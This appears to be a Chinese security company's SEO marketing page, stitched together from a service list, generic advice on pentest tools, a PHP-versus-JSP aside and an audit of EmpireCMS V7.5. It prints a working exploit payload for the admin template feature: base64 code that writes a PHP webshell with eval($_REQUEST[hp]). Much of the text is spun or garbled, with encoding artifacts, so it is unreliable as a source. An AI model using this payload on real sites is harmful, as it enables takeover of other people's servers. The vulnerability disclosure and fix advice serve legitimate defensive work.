服務(wù)方式人工
**服務(wù)周到
app滲透測(cè)試支持
網(wǎng)站安全防護(hù)支持
cc防護(hù)支持
網(wǎng)站漏洞修復(fù),網(wǎng)站程序代碼的安全審計(jì),包括PHP、ASP、JSP、.NET等程序代碼的安全審計(jì),上傳漏洞,SQL注入漏洞,身份驗(yàn)證漏洞,XSS跨站漏洞,命令執(zhí)行漏洞,文件包含漏洞,權(quán)限提升漏洞等的安全審計(jì),網(wǎng)站防篡改方案,后臺(tái)登錄二次安全驗(yàn)證部署,百度風(fēng)險(xiǎn)提示的解除,等惡意內(nèi)容百度快照清理,以及網(wǎng)站后門(mén)木馬和程序惡意掛馬代碼的檢測(cè)和清除,網(wǎng)站源代碼及數(shù)據(jù)庫(kù)的加密和防止泄露。
評(píng)估網(wǎng)絡(luò)安全設(shè)備的使用方式
對(duì)于任意安全設(shè)備而言,管理/控制通道容易出現(xiàn)漏洞。所以,一定要注意您將要如何配置和修改安全設(shè)備--以及允許誰(shuí)執(zhí)行這些配置。如果您準(zhǔn)備通過(guò)Web瀏覽器訪問(wèn)一個(gè)安全系統(tǒng),那么安全設(shè)備將運(yùn)行一個(gè)Web服務(wù)器,并且允許Web流量進(jìn)出。
它是通過(guò)一個(gè)普通網(wǎng)絡(luò)連接(編內(nèi))還是立管理網(wǎng)絡(luò)連接(編外)進(jìn)行訪問(wèn)?如果屬于編內(nèi)連接,那么任何通過(guò)這個(gè)接口發(fā)送流量的主機(jī)都可能攻擊這個(gè)設(shè)備。如果它在一個(gè)管理網(wǎng)絡(luò)上,那么至少您只需要擔(dān)心網(wǎng)絡(luò)上的其他設(shè)備。
應(yīng)用標(biāo)準(zhǔn)滲透測(cè)試工具
、攻擊和威脅載體仍然在不斷地增長(zhǎng)和發(fā)展,而且您必須定期測(cè)試系統(tǒng),除了修復(fù)漏洞,還要保證它們能夠抵擋已發(fā)現(xiàn)的攻擊。
滲透測(cè)試工具和服務(wù)可以檢查出網(wǎng)絡(luò)安全設(shè)備是否容易受到攻擊的破壞。一些開(kāi)源工具和框架已經(jīng)出現(xiàn)了很長(zhǎng)時(shí)間,其中包括Network Mapper(Nmap)、Nikto、開(kāi)放漏洞評(píng)估系統(tǒng)(Open Vulnerability Assessment System, OpenVAS)和Metasploit.當(dāng)然 ,也有很多的商業(yè)工具,如McAfee(可以掃描軟件組件)和Qualys的產(chǎn)品。
這些工具廣泛用于標(biāo)識(shí)網(wǎng)絡(luò)設(shè)備處理網(wǎng)絡(luò)流量的端口;記錄它對(duì)于標(biāo)準(zhǔn)測(cè)試數(shù)據(jù)包的響應(yīng);以及通過(guò)使用OpenVAS和Metasploit測(cè)試它面對(duì)一些常見(jiàn)攻擊的漏洞情況(更多出現(xiàn)在商業(yè)版本上)。
在研發(fā)人員眼中,編碼開(kāi)發(fā)的目的是實(shí)現(xiàn)相關(guān)功能邏輯可用,無(wú)明顯功能 bug。而實(shí)際上,在安全人員眼中,很多這樣看似沒(méi)有功能問(wèn)題的代碼,卻可以利用來(lái)進(jìn)行安全漏洞攻擊。雖然這在很多研發(fā)人員眼中是看似天方夜譚,但很不幸,通過(guò)以往的無(wú)數(shù)重大安全事件的驗(yàn)證,這個(gè)事實(shí)客觀存在。
近期許多網(wǎng)民跟我說(shuō)為何出現(xiàn)系統(tǒng)漏洞的網(wǎng)站程序全是PHP開(kāi)發(fā)設(shè)計(jì)的,而非常少有Jsp和Python的滲透案例,先不用說(shuō)python,就PHP和Jsp談一談。在這以前,先何不記牢那么一個(gè)依據(jù)(眼底下也無(wú)需擔(dān)心它對(duì)嗎):PHP網(wǎng)站系統(tǒng)漏洞類型多但不繁雜,Jsp網(wǎng)站系統(tǒng)漏洞則反過(guò)來(lái)。為什么在被實(shí)戰(zhàn)滲透中的網(wǎng)站大部分是PHP代碼開(kāi)發(fā)設(shè)計(jì)的?這個(gè)問(wèn)題可以先放一放,先說(shuō)下邊的這幾個(gè)問(wèn)題。
近我們SINE安全在對(duì)帝國(guó)CMS系統(tǒng)進(jìn)行代碼安全審計(jì)的時(shí)候,發(fā)現(xiàn)該系統(tǒng)存在漏洞,受影響的版本是EmpireCMS V7.5,從帝國(guó)下載到本地,我們?nèi)斯?duì)其代碼進(jìn)行詳細(xì)的漏洞檢測(cè)與安全代碼分析。共計(jì)發(fā)現(xiàn)三個(gè)高危漏洞,都是在的后臺(tái)管理頁(yè)面上的功能發(fā)現(xiàn)的。該漏洞的產(chǎn)生,根源的問(wèn)題是沒(méi)有對(duì)get,post提交方式進(jìn)行嚴(yán)格的安全效驗(yàn)與過(guò)濾,導(dǎo)致可以插入惡意代碼到后端服務(wù)器中去處理,導(dǎo)致漏洞的發(fā)生。帝國(guó)CMS系統(tǒng),簡(jiǎn)單給大家介紹一下,目前很多站長(zhǎng),以及企業(yè)建站,使用該套系統(tǒng),快速,便捷,易于搜索引擎收錄,采用的是B/S架構(gòu)開(kāi)發(fā),php語(yǔ)言+Mysql數(shù)據(jù)庫(kù),支持大并發(fā)同時(shí)訪問(wèn),可以承載較多的用戶快速的訪問(wèn)的各個(gè)頁(yè)面與內(nèi)容,模板自定義化,可以設(shè)置標(biāo)簽與自行設(shè)計(jì)外觀,靜態(tài)html生成,還有采集功能,深受廣大站長(zhǎng)和運(yùn)營(yíng)者的喜歡。我們SINE安全技術(shù)在對(duì)該代碼進(jìn)行安全檢測(cè)與滲透測(cè)試的手,會(huì)先大體看下代碼,熟悉整個(gè)的架構(gòu),數(shù)據(jù)庫(kù)配置文件,以及調(diào)用到的文件,通常調(diào)用到的安全規(guī)則是如何寫(xiě)的,多個(gè)方面去大體的了解該代碼,目前滲透測(cè)試中,發(fā)現(xiàn)的漏洞有:SQL注入漏洞,敏感信息泄露,初始化安裝功能漏洞,直行平行越權(quán)邏輯漏洞,任意文件上傳漏洞,登錄繞過(guò)漏洞,短信驗(yàn)證碼漏洞,找回密碼漏洞,數(shù)據(jù)庫(kù)備份webshell,XSS跨站,CSRF漏洞等待。
首先我們檢測(cè)到的是帝國(guó)安裝代碼功能上存在可以插入惡意代碼漏洞,在install安裝目錄下的index.php文件中,可以查到表的前綴,也就是獲取前端提交過(guò)來(lái)的參數(shù),然后繼續(xù)往下看,data目錄下的fun.php代碼里的參數(shù)并沒(méi)有做任何的安全效驗(yàn),導(dǎo)致可以直接插入惡意代碼寫(xiě)入到配置文件config.php中去。漏洞詳情如下圖:
后臺(tái)還存在get webshell漏洞,打開(kāi)后臺(tái)管理功能頁(yè)面,選擇管理首頁(yè)模板,緊接著右鍵點(diǎn)擊增加首頁(yè)方案中,復(fù)制漏洞exp代碼:<?php $aa = base64_decode(ZWNobyAnPD9waHAgZXZhbCgkX1JFUVVFU1RbaHBdKTsnPnNoZWxsLnBocA)${(system)($aa)};?> 解密base64后是:ZWNobyAnPD9waHAgZXZhbCgkX1JFUVVFU1RbaHBdKTsnPnNoZWxsLnBocA=>echo '<?php eval($_REQUEST[hp]);'>.php寫(xiě)到模板內(nèi)容頁(yè)面里,左鍵點(diǎn)擊提交,再點(diǎn)擊啟用此方案,就在會(huì)e/admin/template/文件夾下生成一個(gè).php文件。
關(guān)于帝國(guó)CMS漏洞的修復(fù)辦法,對(duì)所有的get,post請(qǐng)求做安全過(guò)濾,也可以直接在eaddslashes2的參數(shù)里增加惡意代碼的機(jī)制,先檢測(cè)后放行,該漏洞的利用條件是需要有后臺(tái)管理員權(quán)限,利用的不是太多,建議對(duì)后臺(tái)的管理目錄進(jìn)行更改,或者直接將管理員的密碼設(shè)置的復(fù)雜一些。如果您對(duì)漏洞修復(fù)不是太懂的話,也可以找的安全公司來(lái)處理,國(guó)內(nèi)SINE安全,啟明星辰,綠盟,都是比較不錯(cuò)的,漏洞經(jīng)常出現(xiàn),也請(qǐng)的運(yùn)營(yíng)者多多關(guān)注EmpireCMS的,一有補(bǔ)丁就立即修復(fù)掉,將安全損失降到低。
網(wǎng)站防入侵和防攻擊等問(wèn)題必須由我們安全技術(shù)來(lái)解決此問(wèn)題,術(shù)業(yè)有專攻。
http://4koz.com